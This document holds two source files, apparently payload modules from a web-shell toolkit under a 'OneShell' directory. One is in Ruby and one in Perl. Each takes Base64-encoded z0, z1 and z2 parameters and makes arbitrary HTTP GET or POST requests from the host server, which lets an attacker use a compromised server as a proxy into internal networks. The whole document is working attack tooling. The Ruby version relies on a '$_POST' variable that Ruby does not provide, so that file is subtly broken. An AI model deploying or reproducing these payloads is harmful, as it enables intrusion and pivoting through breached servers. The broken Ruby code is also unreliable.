File: Payload/Ruby/CGI/OneShell/http.rb
require 'base64'
require 'json'
require 'net/http'
require 'uri'

def http_get(url_str)
  unless url_str.start_with?('http://', 'https://')
    url_str = "http://#{url_str}"
  end

  uri = URI.parse(url_str)
  http = Net::HTTP.new(uri.host, uri.port)
  http.use_ssl = (uri.scheme == 'https')
  http.read_timeout = 15

  request = Net::HTTP::Get.new(uri.request_uri)
  
  response = http.request(request)
  
  if response.is_a?(Net::HTTPRedirection) && response['location']
    return http_get(response['location'])
  end

  [response.code.to_i, response.body]
rescue => e
  [0, "Error: #{e.message}"]
end

def http_post(url_str, data)
  unless url_str.start_with?('http://', 'https://')
    url_str = "http://#{url_str}"
  end

  uri = URI.parse(url_str)
  http = Net::HTTP.new(uri.host, uri.port)
  http.use_ssl = (uri.scheme == 'https')
  http.read_timeout = 15

  request = Net::HTTP::Post.new(uri.request_uri)
  request['Content-Type'] = 'application/x-www-form-urlencoded'
  request.body = data

  response = http.request(request)
  [response.code.to_i, response.body]
rescue => e
  [0, "Error: #{e.message}"]
end

def main
  z0_param = $_POST ? $_POST['z0'] : nil
  action = z0_param ? Base64.decode64(z0_param.to_s) : ''

  result = {
    'status' => 'error',
    'action' => action,
    'http_code' => nil,
    'data' => nil
  }

  case action
  when 'get'
    z1_param = $_POST ? $_POST['z1'] : nil
    url = z1_param ? Base64.decode64(z1_param.to_s) : ''

    if url.empty?
      result['data'] = 'Missing URL'
    else
      http_code, body = http_get(url)
      result['status'] = 'ok'
      result['http_code'] = http_code
      result['data'] = body
    end

  when 'post'
    z1_param = $_POST ? $_POST['z1'] : nil
    z2_param = $_POST ? $_POST['z2'] : nil
    url  = z1_param ? Base64.decode64(z1_param.to_s) : ''
    data = z2_param ? Base64.decode64(z2_param.to_s) : ''

    if url.empty?
      result['data'] = 'Missing URL'
    else
      http_code, body = http_post(url, data)
      result['status'] = 'ok'
      result['http_code'] = http_code
      result['data'] = body
    end

  else
    result['data'] = 'Invalid action'
  end

  print JSON.generate(result)
end

main

File: Payload/Perl/CGI/OneShell/http.pl
use strict;
use warnings;
use CGI;
use MIME::Base64;
use JSON;
use LWP::UserAgent;
use HTTP::Request;

sub main {
    my $q = CGI->new;
    print "1";
    my $z0 = $q->param('z0') // '';
    my $action = decode_base64($z0);
    $action =~ s/^\s+|\s+$//g;

    my %result = (
        status    => 'error',
        action    => $action,
        http_code => undef,
        data      => undef
    );

    my $ua = LWP::UserAgent->new;
$ua->timeout(5);
$ua->agent("Mozilla/5.0");

    if ($action eq 'get') {

    my $url = decode_base64($q->param('z1') // '');

    if (!$url || $url eq '') {
        $result{data} = 'Missing URL';
    }
    else {

        my $response = $ua->get($url);

        $result{http_code} = $response->code;

        if ($response->is_success) {
            $result{status} = 'ok';
        }
        else {
            $result{status} = 'http_error';
        }

        $result{data} = substr($response->content, 0, 1000);
    }
}
    elsif ($action eq 'post') {

        my $url  = decode_base64($q->param('z1') // '');
        my $data = decode_base64($q->param('z2') // '');

        if (!$url || $url eq '') {
            $result{data} = 'Missing URL';
        }
        else {
            my $req = HTTP::Request->new(POST => $url);
            $req->header('Content-Type' => 'application/x-www-form-urlencoded');
            $req->content($data);

            my $response = $ua->request($req);

            $result{status}    = 'ok';
            $result{http_code} = $response->code;
            $result{data}      = $response->decoded_content;
        }

    }
    else {
        $result{data} = 'Invalid action';
    }

    my $json = JSON->new->utf8->canonical(1);
    print $json->encode(\%result);
}

main();